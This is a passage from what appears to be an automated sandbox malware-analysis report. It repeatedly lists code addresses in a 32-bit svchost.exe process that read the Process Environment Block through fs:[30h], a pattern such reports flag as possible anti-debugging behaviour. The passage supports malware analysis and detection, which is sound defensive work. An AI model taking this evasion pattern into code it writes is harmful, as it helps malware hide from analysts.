                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]2_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]2_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]2_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]2_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]2_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]2_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]2_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
